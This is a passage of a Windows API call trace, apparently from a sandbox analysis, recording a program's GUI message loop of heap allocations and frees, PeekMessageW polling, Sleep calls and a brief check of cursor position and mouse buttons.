RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4cd0 [0254.953] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4cd0 | out: hHeap=0xc60000) returned 1 [0254.953] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x38) returned 0xed57f8 [0254.953] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.953] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed57f8 | out: hHeap=0xc60000) returned 1 [0254.953] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.953] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4cd0 [0254.953] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4cd0 | out: hHeap=0xc60000) returned 1 [0254.953] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.953] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4cd0 [0254.953] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe789d8 [0254.953] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4d90 [0254.953] Sleep (dwMilliseconds=0x0) [0254.953] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe789d8 | out: hHeap=0xc60000) returned 1 [0254.953] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4d90 | out: hHeap=0xc60000) returned 1 [0254.953] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4cd0 | out: hHeap=0xc60000) returned 1 [0254.953] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.953] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4cd0 [0254.953] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4cd0 | out: hHeap=0xc60000) returned 1 [0254.953] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4cd0 [0254.953] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4cd0 | out: hHeap=0xc60000) returned 1 [0254.953] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4cd0 [0254.954] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4cd0 | out: hHeap=0xc60000) returned 1 [0254.954] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4cd0 [0254.954] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4cd0 | out: hHeap=0xc60000) returned 1 [0254.954] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x38) returned 0xed57f8 [0254.954] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.954] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed57f8 | out: hHeap=0xc60000) returned 1 [0254.954] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.954] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4cd0 [0254.954] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4cd0 | out: hHeap=0xc60000) returned 1 [0254.954] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.954] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4cd0 [0254.954] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe789d8 [0254.954] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4d90 [0254.954] Sleep (dwMilliseconds=0x0) [0254.954] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe789d8 | out: hHeap=0xc60000) returned 1 [0254.954] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4d90 | out: hHeap=0xc60000) returned 1 [0254.954] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4cd0 | out: hHeap=0xc60000) returned 1 [0254.954] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.954] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4cd0 [0254.954] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4cd0 | out: hHeap=0xc60000) returned 1 [0254.954] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4cd0 [0254.954] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4cd0 | out: hHeap=0xc60000) returned 1 [0254.954] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4cd0 [0254.954] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4cd0 | out: hHeap=0xc60000) returned 1 [0254.954] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4cd0 [0254.954] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4cd0 | out: hHeap=0xc60000) returned 1 [0254.955] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x38) returned 0xed57f8 [0254.955] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.955] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed57f8 | out: hHeap=0xc60000) returned 1 [0254.955] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.955] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4cd0 [0254.955] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4cd0 | out: hHeap=0xc60000) returned 1 [0254.955] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 1 [0254.957] TranslateAcceleratorW (hWnd=0x50150, hAccTable=0x60175, lpMsg=0x87fa94) returned 0 [0254.957] TranslateMessage (lpMsg=0x87fa94) returned 0 [0254.957] DispatchMessageW (lpMsg=0x87fa94) returned 0x0 [0254.957] GetForegroundWindow () returned 0x50150 [0254.957] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0254.957] GetCursorPos (in: lpPoint=0x87f8d0 | out: lpPoint=0x87f8d0*(x=577, y=534)) returned 1 [0254.957] ScreenToClient (in: hWnd=0x50150, lpPoint=0x87f8d0 | out: lpPoint=0x87f8d0) returned 1 [0254.957] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x24) returned 0xe978f0 [0254.957] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe789d8 [0254.957] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4cd0 [0254.957] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4d90 [0254.957] GetAsyncKeyState (vKey=1) returned 0 [0254.957] GetAsyncKeyState (vKey=2) returned 0 [0254.957] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.957] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.957] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe78dc8 [0254.958] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4ca0 [0254.958] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4d90 | out: hHeap=0xc60000) returned 1 [0254.958] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe789d8 | out: hHeap=0xc60000) returned 1 [0254.958] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4cd0 | out: hHeap=0xc60000) returned 1 [0254.958] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe978f0 | out: hHeap=0xc60000) returned 1 [0254.958] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe78dc8 | out: hHeap=0xc60000) returned 1 [0254.958] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4ca0 | out: hHeap=0xc60000) returned 1 [0254.958] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.958] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.958] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.958] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.958] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.958] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.958] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.958] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.958] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.958] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.958] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x38) returned 0xed57f8 [0254.958] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.958] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed57f8 | out: hHeap=0xc60000) returned 1 [0254.958] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.958] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.958] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.959] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.959] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.959] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe78dc8 [0254.959] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4ca0 [0254.959] Sleep (dwMilliseconds=0x0) [0254.959] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe78dc8 | out: hHeap=0xc60000) returned 1 [0254.959] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4ca0 | out: hHeap=0xc60000) returned 1 [0254.959] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.959] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.959] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.959] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.959] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.959] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.959] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.959] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.959] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.959] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.959] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x38) returned 0xed57f8 [0254.959] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.959] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed57f8 | out: hHeap=0xc60000) returned 1 [0254.959] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.959] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.960] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.960] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.960] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.960] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe78dc8 [0254.960] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4ca0 [0254.960] Sleep (dwMilliseconds=0x0) [0254.960] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe78dc8 | out: hHeap=0xc60000) returned 1 [0254.960] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4ca0 | out: hHeap=0xc60000) returned 1 [0254.960] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.960] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.960] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.960] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.960] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.960] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.960] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.960] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.960] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.960] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.960] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x38) returned 0xed57f8 [0254.960] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.960] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed57f8 | out: hHeap=0xc60000) returned 1 [0254.960] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.960] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.961] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.961] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.961] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.961] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe78dc8 [0254.961] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4ca0 [0254.961] Sleep (dwMilliseconds=0x0) [0254.961] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe78dc8 | out: hHeap=0xc60000) returned 1 [0254.961] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4ca0 | out: hHeap=0xc60000) returned 1 [0254.961] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.961] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.961] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.961] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.961] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.961] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.961] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.961] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.961] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.961] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.961] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x38) returned 0xed57f8 [0254.961] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.961] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed57f8 | out: hHeap=0xc60000) returned 1 [0254.961] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.962] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.962] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.962] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.962] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.962] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe78dc8 [0254.962] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4ca0 [0254.962] Sleep (dwMilliseconds=0x0) [0254.962] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe78dc8 | out: hHeap=0xc60000) returned 1 [0254.962] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4ca0 | out: hHeap=0xc60000) returned 1 [0254.962] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.962] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.962] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.962] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.962] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.962] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.962] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.962] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.962] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.962] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.962] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x38) returned 0xed57f8 [0254.962] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.962] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed57f8 | out: hHeap=0xc60000) returned 1 [0254.962] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.962] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.963] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.963] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.963] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.963] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe78dc8 [0254.963] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4ca0 [0254.963] Sleep (dwMilliseconds=0x0) [0254.963] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe78dc8 | out: hHeap=0xc60000) returned 1 [0254.963] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4ca0 | out: hHeap=0xc60000) returned 1 [0254.963] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.963] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.963] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.963] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.963] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.963] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.963] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.963] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.963] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.963] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.963] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x38) returned 0xed57f8 [0254.963] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.963] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed57f8 | out: hHeap=0xc60000) returned 1 [0254.963] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.963] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.964] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.964] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.964] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.964] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe78dc8 [0254.964] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4ca0 [0254.964] Sleep (dwMilliseconds=0x0) [0254.964] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe78dc8 | out: hHeap=0xc60000) returned 1 [0254.964] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4ca0 | out: hHeap=0xc60000) returned 1 [0254.964] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.964] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.964] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.964] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.964] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.964] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.964] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.964] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.964] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.964] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.964] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x38) returned 0xed57f8 [0254.964] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.964] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed57f8 